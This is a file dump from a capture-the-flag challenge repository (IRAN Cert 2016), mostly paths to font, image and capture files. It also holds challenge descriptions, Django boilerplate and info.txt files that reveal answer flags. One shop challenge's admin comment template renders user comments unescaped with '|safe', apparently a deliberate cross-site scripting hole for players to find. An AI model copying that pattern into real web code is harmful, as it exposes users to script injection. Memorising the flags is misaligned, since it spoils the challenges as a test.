-------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bolditalic-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bolditalic-webfont.woff -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bolditalic-webfont.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bolditalic-webfont.woff2 -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-italic-webfont.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-italic-webfont.eot -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-italic-webfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-italic-webfont.ttf -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-italic-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-italic-webfont.woff -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-italic-webfont.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-italic-webfont.woff2 -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-light-webfont.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-light-webfont.eot -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-light-webfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-light-webfont.ttf -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-light-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-light-webfont.woff -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-light-webfont.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-light-webfont.woff2 -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-lightitalic-webfont.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-lightitalic-webfont.eot -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-lightitalic-webfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-lightitalic-webfont.ttf -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-lightitalic-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-lightitalic-webfont.woff -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-lightitalic-webfont.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-lightitalic-webfont.woff2 -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-medium-webfont.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-medium-webfont.eot -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-medium-webfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-medium-webfont.ttf -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-medium-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-medium-webfont.woff -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-medium-webfont.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-medium-webfont.woff2 -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-mediumitalic-webfont.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-mediumitalic-webfont.eot -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-mediumitalic-webfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-mediumitalic-webfont.ttf -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-mediumitalic-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-mediumitalic-webfont.woff -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-regular-webfont.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-regular-webfont.eot -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-regular-webfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-regular-webfont.ttf -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-regular-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-regular-webfont.woff -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-regular-webfont.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-regular-webfont.woff2 -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thin-webfont.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thin-webfont.eot -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thin-webfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thin-webfont.ttf -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thin-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thin-webfont.woff -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thin-webfont.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thin-webfont.woff2 -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thinitalic-webfont.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thinitalic-webfont.eot -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thinitalic-webfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thinitalic-webfont.ttf -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thinitalic-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thinitalic-webfont.woff -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thinitalic-webfont.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thinitalic-webfont.woff2 -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/demo/demo-particles.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/demo/demo-particles.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/demo/demo-slideshow.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/demo/demo-slideshow.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/demo/demo-static.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/demo/demo-static.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/main-logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/main-logo.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/slides/dandelion.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/slides/dandelion.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/slides/greens.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/slides/greens.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/slides/woods.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/slides/woods.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/PPC & Web/100pt- I hate captchas/info.txt: -------------------------------------------------------------------------------- 1 | Description: 2 | Brute captcha to get the flag. 3 | 4 | 5 | https://github.com/VulnHub/ctf-writeups/blob/master/2015/hackim/web-500.md -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/PPC & Web/100pt- I hate captchas/solve/captcha.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/PPC & Web/100pt- I hate captchas/solve/captcha.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/PPC & Web/100pt- I hate captchas/solve/out.txt: -------------------------------------------------------------------------------- 1 | HELLE 2 | 3 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/PPC & Web/100pt- I hate captchas/solve/output.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/PPC & Web/100pt- I hate captchas/solve/output.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/PPC & Web/100pt- I hate captchas/solve/output2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/PPC & Web/100pt- I hate captchas/solve/output2.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/README.md: -------------------------------------------------------------------------------- 1 | LSB Steganography 2 | ================= 3 | 4 | A basic example of how to use LSB (Least Significant Bit) steganography on a BMP image 5 | 6 | http://en.wikipedia.org/wiki/Steganography#Example_from_modern_practice 7 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/Resources/README.md: -------------------------------------------------------------------------------- 1 | LSB Steganography 2 | ================= 3 | 4 | A basic example of how to use LSB (Least Significant Bit) steganography on a BMP image 5 | 6 | http://en.wikipedia.org/wiki/Steganography#Example_from_modern_practice 7 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/Resources/lsb.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/Resources/lsb.bmp -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/Resources/lsb1.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/Resources/lsb1.bmp -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/info.txt: -------------------------------------------------------------------------------- 1 | Description: 2 | I always hated to be that last one, At least i should be in the second least place. 3 | 4 | 5 | Flag: 6 | APACTF{7H!5_0n3_was_4_little_TRICKY} 7 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/lsb.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/lsb.bmp -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/lsb1.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/lsb1.bmp -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/slsb/file.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/slsb/file.bmp -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- secret channel/flag.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- secret channel/flag.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- secret channel/for.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- secret channel/for.pcapng -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- secret channel/info.txt: -------------------------------------------------------------------------------- 1 | Flag: 2 | APACTF{C00l_!_Found_4N0TH3R_Fl4G} -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- secret channel/secret channel/secret.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- secret channel/secret channel/secret.pcapng -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources.zip -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/local-admin-server/templates/comment.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | {{ comment|safe }} 5 | 6 | 7 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/.idea/.name: -------------------------------------------------------------------------------- 1 | project -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/.idea/encodings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/.idea/scopes/scope_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/app/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/app/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/app/admin.py: -------------------------------------------------------------------------------- 1 | from django.contrib import admin 2 | 3 | # Register your models here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/app/tests.py: -------------------------------------------------------------------------------- 1 | from django.test import TestCase 2 | 3 | # Create your tests here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/comments/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/comments/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/comments/admin.py: -------------------------------------------------------------------------------- 1 | from django.contrib import admin 2 | 3 | # Register your models here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/comments/tests.py: -------------------------------------------------------------------------------- 1 | from django.test import TestCase 2 | 3 | # Create your tests here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/project/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/project/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/shop/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/shop/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/shop/admin.py: -------------------------------------------------------------------------------- 1 | from django.contrib import admin 2 | 3 | # Register your models here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/shop/tests.py: -------------------------------------------------------------------------------- 1 | from django.test import TestCase 2 | 3 | # Create your tests here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/shop/urls.py: -------------------------------------------------------------------------------- 1 | from django.conf.urls import include, url, patterns 2 | from views import * 3 | 4 | 5 | urlpatterns = patterns('', 6 | url(r'^$', 'shop.views.index', name='shop_index'), 7 | ) 8 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/django-shop/django-shop1.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/django-shop/django-shop1.zip -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/django-shop/django-shop1/source.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/django-shop/django-shop1/source.zip -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/django-shop/django-shop2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/django-shop/django-shop2.zip -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/flask-3pt/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/flask-3pt/templates/comment.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |
{{ flag1 }}
